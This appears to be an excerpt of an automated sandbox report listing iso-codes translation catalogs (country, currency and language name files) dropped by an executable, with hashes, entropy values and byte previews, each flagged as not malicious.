                                                                                                    SHA-512:3E86D41B037D9399ABD925470BA8037EF2A75C186EBB5C36DA76A1EC3259EAD39B3DFDD95A45532A509A4D50C8C8DA6B1D3CFE8D3E31E9BFE1D2818C03B8149A
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................!.......&.......3...............8... .......Y.......a.......t...................*................................... ...............?.......N...'...[...........................................1...................'.......G...1...S................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 149 messages, Project-Id-Version: iso_4217 'ADB obra\304\215unska jedinica'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7652
                                                                                                    Entropy (8bit):4.85782804114856
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:qfbCmwZX5qaLMjlaWBgUCS/6zcwsikNRU3s:qfZVp1BbrCz8HRU3s
                                                                                                    MD5:BA6DDF1B531E7ECA34D00EFFA58637B4
                                                                                                    SHA1:A12EE0276853555CCEB0855980AF7000AD04E02C
                                                                                                    SHA-256:C05F4B42D93BEA63F1B61BA32CBEA244390188FCE31F9B32EF865CFFBFEBA085
                                                                                                    SHA-512:854BF12A4A7BA925E3CDDB1F274F509B01C249E35C3CF8A1015ACA72582C0E3AA4362D541571EE2D0760DEBA7BBD4C238E4F98D8E2201BCDF4030FD324BBE242
                                                                                                    Malicious:false
                                                                                                    Preview:........................l...............................................................................................................,.......=.......G.......V.......d.......r...............................................................................................$.......1.......8.......E.......K.......Z.......`.......o.......t...............................................................................................................&.......7.......?.......M.......Z.......g.......s...............................................................................................................................................).......;.......K.......X.......e.......u.......................................................................................................+.......5.......<.......J.......Z.......c.......r.......w...............................................................................................................................-.......D.......H.......X.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 349 messages, Project-Id-Version: iso_639-3 'abkaski'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14420
                                                                                                    Entropy (8bit):4.731558475272077
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:mFWj1htCz6VCLip0+z6XD7vAEFMrNMZCFKCPHarTAo:TQVP771T5
                                                                                                    MD5:2A254BC676EC86BE36423581A6F03A3F
                                                                                                    SHA1:FCC5AE7B263C5645F4BF2A404901795F14021EB6
                                                                                                    SHA-256:1113E2127438532425F6F153C3786802FA5BE2790E45AEF7F6A8EDCE41853002
                                                                                                    SHA-512:4457EF12D7E292F990FE3E3065D0CC5414AEF539AAB0A7D470853C36E7354EC28971FF4911726FCF111DA5F70EFA890F703A4F2FB30C32B9CB03841AB027D6AB
                                                                                                    Malicious:false
                                                                                                    Preview:........].......................8.......9.......C.......L.......R.......Z......._.......h.......r.......w....................................................................................................................................................................... .......%.......0.......8.......A.......G.......L.......T.......`.......h.......m.......t.......}...............................................................................................................................................................%.......6.......=.......E.......N.......S.......Y.......b.......h.......o.......v.......}........................................................................................................................ ....... ....... ....... ......# ......+ ......2 ......: ......> ......E ......N ......T ......W ......] ......b ......g ......p ......w ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 76 messages, Project-Id-Version: iso_639-5 'afro-azijski jezici'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5040
                                                                                                    Entropy (8bit):4.908121503787829
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:C+f02TTbr8DCnBK0E0Cj2FJcCkNrCCVLAYNet2QoFSv8KxexyeZhPlIoP:8EbrwCno0E0/FV+rsYc9oFSv8Kxexyev
                                                                                                    MD5:437F4C6E876EA86352F8CB8EC280A0A9
                                                                                                    SHA1:88AA0F3B67B92E62119ED0E08E29303CCF062A24
                                                                                                    SHA-256:DD9B60CD0A8E099E43A9A5375BDC7D627802ECF23BA29640475116A34A359F38
                                                                                                    SHA-512:A8A707C7C46FC11565A3A52723078DCFD6D04D7695265FEA37DD2084C4A996F1D60156B8D42B02A1A34ADEA71AAF7AB9DC6CF2B84A4807955B83B7717E3A4A6F
                                                                                                    Malicious:false
                                                                                                    Preview:........L.......|...e...........p.......q...............................................................................?.......R.......b.......r...................................!...............................%...*.......P.......c.......w.......................................................................4.......F.......Z.......l.......|...............................................................................8.......O.......o...............................................................................$.......;.......L.......].......o...............................................................................+.......:...............-.......A.......Q.......`.......r.......................................................................................>.......N...$...]...........................0...........................................G.......Z.......k.......................................................................................+.......>.......N.......Z.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 '\320\260\320\264\320\273\320\260\320\274'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12875
                                                                                                    Entropy (8bit):5.215522588790584
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dqnckAzIltU4WjV9qWxa5hW8W7Vdr3QvMn0GCl:4nszIg4WjVDxa5hW8W7VdTQvY0l
                                                                                                    MD5:C7989CE3365F908A5129CE9FAAD70E0B
                                                                                                    SHA1:6A014B599A76983526F6EE51280675A5CCF3411B
                                                                                                    SHA-256:798A3518A1A31DB2D09616A66E61D8A51BF0F17B16D1CC824D88A3CFC8796861
                                                                                                    SHA-512:4E0323F6F4C1548152612105A98AEF395064713C791E8C8502003935B0A3454DDD2B06BA3F11D94FA229132915B563BCB0F96B4F5002825F72CFCB48224C1AE1
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 419 messages, Project-Id-Version: iso_3166-1 '\320\220\320\262\320\263\320\260\320\275\320\270\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28915
                                                                                                    Entropy (8bit):5.227774975782007
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:jhl7o5a/DvWYV4gr/Ubjh5wsWP4XdAIzirG9gYXiIKDWIPKQIyRzaxS:jhZq2DrItmsWP4XdAItgYXkPXRzag
                                                                                                    MD5:F71C7854BE296BE80CCECF524E00961E
                                                                                                    SHA1:69E43A7B3386358B8AEDBDFD8B76A86FDBFE7B1C
                                                                                                    SHA-256:BE012001C63CD5C8D8A872B8B6C00E63BEEF7525E9764F8EDE04691307109D7B
                                                                                                    SHA-512:7178789026A60158E7504F3B2FE02A40BC5450BD0975BADD123F610D77452E0D47DE95131C61E241515D68939C009DC4EB4C0ABD972C511A0074A8CD2E44078D
                                                                                                    Malicious:false
                                                                                                    Preview:................4...3...L........#.......#......%#......-#......5#......D#......L#......S#......\#......g#......{#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......#$.. ...*$......K$......S$.. ...s$.......$.......$.......$.......$.......$.......$.......$.......%.......%......'%....../%......:%......C%......L%......S%......b%......{%.......%.......%.......%.......%.......%.......%.......%..,....%...... &......(&..%....&......T&......a&......l&......t&......y&.......&.......&.......&.......&..%....&..,....&.."....'..*...%'......P'......X'......a'......j'......}'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(..'....(..$...9(......^(......z(.......(.......(.......(.......(.......(.......(.......).......)......")......2)......N)......T)......f)......m)......u)......}).......).......).......).......).......).......).......).......).......).......).......).......).......)......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2961 messages, Project-Id-Version: iso_3166-2 '\320\225\320\262\320\260'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):144341
                                                                                                    Entropy (8bit):5.333446802531706
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:jNKKf3jNu6CvH2NqamnClypNqTQ7KGP615eskU8vqE9huXBQ:pKSQkl/m610lTiE9EXS
                                                                                                    MD5:CEE43B1599F0554431B9AEB7F300C39A
                                                                                                    SHA1:3A67EAC53858D21B2A7672B280556E64BCBFE10C
                                                                                                    SHA-256:4DB2A2AC77DA6105ACCE116E1FE46D1542C7A0281F3A1347D888558EC1B3D48D
                                                                                                    SHA-512:C951BCB86157A899C28DDAA69027DCA99D713A56FBD28FDE5D3BCAEB0CABEDB377EA354BF300F0161B7CABD6CE317243F481ADF5BD04288499E54E3C2F13AA58
                                                                                                    Malicious:false
                                                                                                    Preview:.................\......,.......(.......)...............4.......<.......C.......Q......._.......d.......i.......r.......w...............................................................................................................................................".......3.......B.......G.......S.......Y.......g.......m.......z....................................................................................................................................................... .......*.......4.......B.......M.......[.......h.......p.......x.......................................................................................................................................................#.......,.......;.......D.......K.......Q.......Z.......a.......i.......p.......w...............................................................................................................................*.......6.......D.......L.......Y.......c.......k.......w.......................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\320\221\321\200\320\270\321\202\320\260\320\275\321\201\320\272\320\260 \320\220\320\275\321\202\320\260\321\200\320\272\321\202\320\270\321\207\320\272\320\260 \320\242\320\265\321\200\320\270\321\202\320\276\321\200\320\270\321\230\320\260'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3352
                                                                                                    Entropy (8bit):5.504943509328304
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADEQAdiLDfvGqIfdvqNuoU2IFSd1OMNctVmSDx7VByX:qDEqryBoKFE1O5VByX
                                                                                                    MD5:AD94A375D65D5F9FE0E08B6F16E8F606
                                                                                                    SHA1:80ABEB7D8159A9C9D9FBE02E140287C2FDEA7E71
                                                                                                    SHA-256:63DB03277DAD4F335B9779B938E93AD8321CF3A050FB1EB87D2DEBC822B87579
                                                                                                    SHA-512:00677CB36E29DF87EECE4A7483664EBE289A8ABAD98A6741C5B9153C5172355CAB07827B7A465250659C271B7CF83730C98DA0C9043554BE175DC55691344704
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................>.......F.......^......./...v...b............... ...........9...(...S...'...|...L.......8.......'...*.......R.......n...........................G.......&...$...!...K.......m.......x...1.......[.......)..."...;...L...........\....................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 149 messages, Project-Id-Version: iso_4217 '\320\220\320\224\320\221 \320\276\320\261\321\200\320\260\321\207\321\203\320\275\321\201\320\272\320\260 \321\230\320\265\320\264\320\270\320\275\320\270\321\206\320\260'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9338
                                                                                                    Entropy (8bit):5.112742378413995
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:qfbCmwZXCoSO9LHgjlaWBgUCSQ1bl53BkMsTCAapL1jIKz27XCN6Ss:qfZEhLu1BbrubAeTLACsSs
                                                                                                    MD5:4EAB59EFED3F0DE7678E906FC1FF3330
                                                                                                    SHA1:03EFDC8C01D73D35302A091B8E6AAD5490A9FB36
                                                                                                    SHA-256:620A6B7FD62D451DCDF88FBC89A3BD726D8209AA6B76F0685A3A989C217AC276
                                                                                                    SHA-512:2F51DCE5A78F9C8291A171401450DDD6358D19C4CA1CAC3BDCA45E3556BE4EC8FF73FD3678EE7403F395BD261473DF48A5DDFD5A028B75871B8AEBD1414DE06C
                                                                                                    Malicious:false
                                                                                                    Preview:........................l...............................................................................................................,.......=.......G.......V.......d.......r...............................................................................................$.......1.......8.......E.......K.......Z.......`.......o.......t...............................................................................................................&.......7.......?.......M.......Z.......g.......s...............................................................................................................................................).......;.......K.......X.......e.......u.......................................................................................................+.......5.......<.......J.......Z.......c.......r.......w...............................................................................................................................-.......D.......H.......X.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 349 messages, Project-Id-Version: iso_639-3 '\320\260\320\261\320\272\320\260\321\201\320\272\320\270'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):17095
                                                                                                    Entropy (8bit):4.996829825096291
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:mFWj1htC9ZgnQt67vAEFMrNMZCFV/Tjdvrlqb:TQDgnQs7a4
                                                                                                    MD5:8487662C28D2CA8E897A09B52C1EF620
                                                                                                    SHA1:84BE702645F845A8B7510A32DEB26CBB2645CCE5
                                                                                                    SHA-256:A574C7A2B8D6D3459113624C47947410F1B3FEFB13AC460859BDE82E7900A667
                                                                                                    SHA-512:1F52F36E792C36034FB3B93EAFF91BC8E10BBCE5D414ABF11483431B931927C99FE618FA2461B9F4CE93E7C92E94D30AF545E978A24FD5113CD80EA5A15E14AE
                                                                                                    Malicious:false
                                                                                                    Preview:........].......................8.......9.......C.......L.......R.......Z......._.......h.......r.......w....................................................................................................................................................................... .......%.......0.......8.......A.......G.......L.......T.......`.......h.......m.......t.......}...............................................................................................................................................................%.......6.......=.......E.......N.......S.......Y.......b.......h.......o.......v.......}........................................................................................................................ ....... ....... ....... ......# ......+ ......2 ......: ......> ......E ......N ......T ......W ......] ......b ......g ......p ......w ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 76 messages, Project-Id-Version: iso_639-5 '\320\260\321\204\321\200\320\276-\320\260\320\267\320\270\321\230\321\201\320\272\320\270 \321\230\320\265\320\267\320\270\321\206\320\270'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6247
                                                                                                    Entropy (8bit):5.142517398572794
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:C+f02TTl/K0E0Cj2FJcCIgtDja8erq73NRZMkfmf:8Ely0E0/FVVtD+8e837Ztmf
                                                                                                    MD5:AD761DBBAC0E4F0927FB875C52841C84
                                                                                                    SHA1:2C88452A3845B7B30E224AE8AD47285DC1A74A9A
                                                                                                    SHA-256:DF8A62B8A3236F50A65D6654729D761D9D0E41D6D84ED6533CE1AB7BDE948083
                                                                                                    SHA-512:0C618267DC4A479A5088BB7F487491044B6EDBE3A6940DCF490EB319B7626092FFAA27B1B68E81DC9D3F52962756B0FFB1908F5F0E0D9A9772937203DCF94926
                                                                                                    Malicious:false
                                                                                                    Preview:........L.......|...e...........p.......q...............................................................................?.......R.......b.......r...................................!...............................%...*.......P.......c.......w.......................................................................4.......F.......Z.......l.......|...............................................................................8.......O.......o...............................................................................$.......;.......L.......].......o...............................................................................+.......:...$...!...%...F.......l...................%.......%.......(.......)...5......._...#...}...........%...................................7.......U...D...q...................$.......V...$.......{...........,..............."...........8...&...X...................&.......$...............%.......#...=.......a..................."......................."...........
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10290
                                                                                                    Entropy (8bit):5.0461554772581385
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dd0l3vxrYltU4WjV9qWxa5hW8fowV77QM3omfC0vWOE:YlZ8g4WjVDxa5hW8fowVYM3rC0v9E
                                                                                                    MD5:88EA602E2D427738F859251EF3016449
                                                                                                    SHA1:20CB7A1A17021B049F457B52BD60F63DD53165A1
                                                                                                    SHA-256:8E2BF4FA27926A2CD8C899812899DBC3EE33BEFF5B269DA5EEA737DEABD6382F
                                                                                                    SHA-512:F857909F9A769277D5BAD75FC4F79BF5EAC66647FF8AAAD71F724DF06F9B988B671C2CF9D089BFFD7B762F332A12872C07D993D3E977709F083828F147A76557
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23553
                                                                                                    Entropy (8bit):5.00391187760097
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosUm0dIFoGVvorh2p5Z46nbjz5wsWP48WAINiZG197E3B0bmJOLNINLJR:0oPm0aFoivorh2p5Z48fmsWP48WAIXep
                                                                                                    MD5:BE1D05AEAE528CBAA16B48111E2CC3AE
                                                                                                    SHA1:868C4083A1FA6497EA178877766D0012F2D4E858
                                                                                                    SHA-256:85DCCEA79D95E97415E31FD05364971A6CFE674055F61D12F90389BED71AD3B4
                                                                                                    SHA-512:FFEB77224807663B7C48F668D3C865CD38E8A191DF7EDACEB0567C274EFC895F9519B1AC29951B12CEE1F83BD369B7D1986B7174804F74278823EA44560F5122
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 3741 messages, Project-Id-Version: iso_3166-2 ''Eua'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):158999
                                                                                                    Entropy (8bit):5.2483581712230745
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:lSD/wpv3r8y49s7nGa0WHHNAxddUt8/4g6ijD1xZVeadFFH85hwQg3c1:lSIrH427ntHh84g3jl85hXgU
                                                                                                    MD5:B1E77AB6E87A1F8C5D740A7AD0342945
                                                                                                    SHA1:27E67D3EFB1B6C85CF4A54C8B46AEEA0E1FFEF7F
                                                                                                    SHA-256:59CF516C043388BDC1444472DA34C644FED3A48551A0D142E9F29C1284452285
                                                                                                    SHA-512:2A79DEBE2B05164364A130D742AA3819FBEA46A7BA26C176E4FBA4B444BDED98D7487850E6D83728DFC87DBDCA5E95CCF9CC83D22B34DE09A41C167DA04CA47C
                                                                                                    Malicious:false
                                                                                                    Preview:.................u...............7.......7.......7.......7.......8.......8.......8......'8......,8......18......:8......?8......G8......P8......U8......]8......g8......l8......{8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......9.......9......$9......09......69......D9......J9......W9......]9......f9......j9......q9......w9......}9.......9.......9.......9.......9.......9.......9.......9.......9.......9.......9.......9.......9.......:.......:......%:......3:......<:......H:......Y:......n:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......;.......;.......;......$;......3;......A;......Q;......\;......h;......r;......};.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......<.......<.......<.......<......$<......4<......L<......Y<......g<......t<.......<.......<.......<.......<.......<.......<.......<.......<.......<.......<.......<......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Brittiska antarktiska territoriet'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2738
                                                                                                    Entropy (8bit):5.1599250258057285
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3UlE1p+vGqIfdvqN5CoUxXhre7NiwzB0JW+JReTqF4g:rLvlp+yaComhSpvqJemF4g
                                                                                                    MD5:ACFC279F23E2E67A32471A35BD425089
                                                                                                    SHA1:B1743EC4A5BA26733758D6612A9E12BA4D77824D
                                                                                                    SHA-256:6ED8EA56CCE18506676017B6B95EB9DA9379A66284E10D00EF15AD96004AF4B1
                                                                                                    SHA-512:06601F6F7BAD69A8F9CDEC91A50B0756CA4DC3DF6F1FE20B2CCA07DEECD6FDA2CC3A68DA223098C16D9F574A40F4282504A93ECD3AA463E32F35E54F9898699A
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+.......................!...............................5.../.......e.......m...........................(...................................(.......5.......N.......Z... ...i..................................."....................... ...........3...0...>...0...o................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 175 messages, Project-Id-Version: iso_4217 'ADB-kontoenhet'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9466
                                                                                                    Entropy (8bit):4.965728524865174
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:jwVUx73poFm6Dd1yK0v2LC/9nPdUF4mCJ:jwKx7mFdDXL0vUU9nP+F4mCJ
                                                                                                    MD5:141588DB41A3FD7D7C1FA9FA1481F184
                                                                                                    SHA1:304DDBAE041E6FC3D727652F868C07BE15215C14
                                                                                                    SHA-256:F52151D76359CDA93689B08CB6973EA1D5E535655779178243C42D0AFDBE4B88
                                                                                                    SHA-512:6AA5A84EE05E9A43C75BDEEDF6C4EBB382B8AA626C007858163DD31B5A5E75D3CD2955C636A32DB1566713189A9C65ECA4B35F6C664C2BCC5770A85E935BEADF
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................................................*.......:.......I.......N.......U.......e.......v...........................1.......3.......9.......7...Q.......................................................................................#...0...0.......a.......p......................................................................................................................./.......>.......P......._.......d.......{.......................................................................................................................&.......6.......F.......V.......[.......`.......n.......u.......z.......................................................................................................................!...............>.......Q.......W.......].......c.......r.......................................................................................".......).......3.......D.......R.......b.......k.......z...............
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 9084 messages, Project-Id-Version: iso_639-3 ''Are'are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):398696
                                                                                                    Entropy (8bit):5.261024147034073
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:RSnUONCLf6F7G6q7Q09KkW9J9zpoWgCpiSS0ZWYDgid6PpisEi8/pfn5xuF/C15q:xspoWg4D1DgiwBzEiQDf15UcZCJ
                                                                                                    MD5:8E7317C56525A25329B7435C87B19094
                                                                                                    SHA1:5CCC0FC89642353322E460BE970741E0071FECD9
                                                                                                    SHA-256:80D8DE04E5E3419C2E86FB18710D25D1829D25D74FE8519C532F1FD7ED7F3BAE
                                                                                                    SHA-512:04DCE54B6FA14A474F046DCAEC5705DC6AF791C5695AB52DEA5747F0D4823011DFCE181286146386700AED9BB289FEEBDB8B61DA3DC22F0CE1BD310E2098B3BE
                                                                                                    Malicious:false
                                                                                                    Preview:........|#..........Q/...7...... .......!.......*.......4.......9.......D.......I.......P.......V.......\.......h.......p.......u.......z.......................................................................................................................................................................*.......2.......9.......>.......F.......K.......T.......`.......o.......x.......~.......................................................................................................................................%.......3.......C.......Q.......Y......._.......f.......m.......r.......y............................................................................................................................................... .......$.......)...............B.......Z.......p.......~...............................................................................................!.......+.......5.......<.......H.......M.......U.......Z.......a.......g.......o.......v.......~...............
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'Afroasiatiska spr\303\245k'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7469
                                                                                                    Entropy (8bit):4.9160562406844
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:XohhvFk/Dxi2EHAakW7fHolP2RSlSE0BfCuXr5VcJHVCBv2qBLIDjz0c:4SDx6HxkwolPPSE0BfNcaYqeHz5
                                                                                                    MD5:DE97E18E0E3A943B68FA7CB5B05CEB33
                                                                                                    SHA1:1CD5C73F409229B50FBCC064D003D19C0E8033B2
                                                                                                    SHA-256:C8ADBF2D067B52970F9C6146B9ADCD90DAF7CADEEA588B3C5C8B27F414A5FA15
                                                                                                    SHA-512:BE6860173FAB82B44CE9D5A126EAE91A4CBCBB68A166C83B932012434B4A9F55D7A70D393F85E9DD8394EBAC3F9465457103A63C3FAA2884DF2C2A4E9F3D900B
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...........................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 168 messages, Project-Id-Version: iso_3166-1 'Afghanistani'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7984
                                                                                                    Entropy (8bit):4.796555065892604
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:THcIBhtQG9jryDAqTSFNRE6/ubTgANLmZRVad3Bz:IUcGtMAqqNd/ubDNIRwdxz
                                                                                                    MD5:18B106E679FC831A88A37E3A604C74CC
                                                                                                    SHA1:67730242DB6E9F40298F121F6A11DF6DECE237E1
                                                                                                    SHA-256:A6EA3901CAE385432B3D5BEFE1CB72B71DB2FA197C9CB66F44CF2171F7974881
                                                                                                    SHA-512:6140FF7E07D677983BB6B85286618A55B4682018D787E759B790327CD13FA7472B3D4B9DFBAACB148E8DE38DBE9FEDF188DCEABAE603D14319B225FA2245BE99
                                                                                                    Malicious:false
                                                                                                    Preview:................\...............(.......).......5.......=.......E.......T.......\.......c.......l.......w...............................................................................................................................................#.......+.......B.......K.......Y.......`.......r.......{...............................................................................................................0.......8.......>.......K.......V.......^.......c.......j.......y...............................................................................................................................)......./.......6.......>.......F.......L.......V.......].......g.......o.......z.......................................................................................................................................................!.......(......./.......:.......@.......S.......f.......x.......................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):456
                                                                                                    Entropy (8bit):5.2697268124881465
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i4T1xxjt02Ukuoa/aU5LLP3eXmBQWiR8A:RL5t0U1eaIOXmk
                                                                                                    MD5:B1DF1DD60CA188D8F2DC7DC96F384FD8
                                                                                                    SHA1:E07139AFE7906F684615D6AF4BE1D839AD6A2E32
                                                                                                    SHA-256:193CFCB4EF214E5E81DF4649EA135BA00BC196872AEDA20EA47B9FB30D3CDF9A
                                                                                                    SHA-512:D089BE9C960F262BE7F64964D6E4D06E87E97F2144DF61B344BF11F686BC64CCA31908E029973B0C5B4D4A7C8B99AE243C6E1FF059D24857B9BD26D9A34EB355
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8.......9................Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2009-05-05 15:32+0200.Last-Translator: Muhsin Omar <mrfroasty@gmail.com>.Language-Team: Swahili <translation-team-sw@lists.sourceforge.net>.Language: sw.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.X-Generator: KBabel 1.11.4..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 '\340\256\205\340\256\237\340\257\215\340\256\262\340\256\276\340\256\256\340\257\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15455
                                                                                                    Entropy (8bit):4.995814981670657
                                                                                                    Encrypted:false
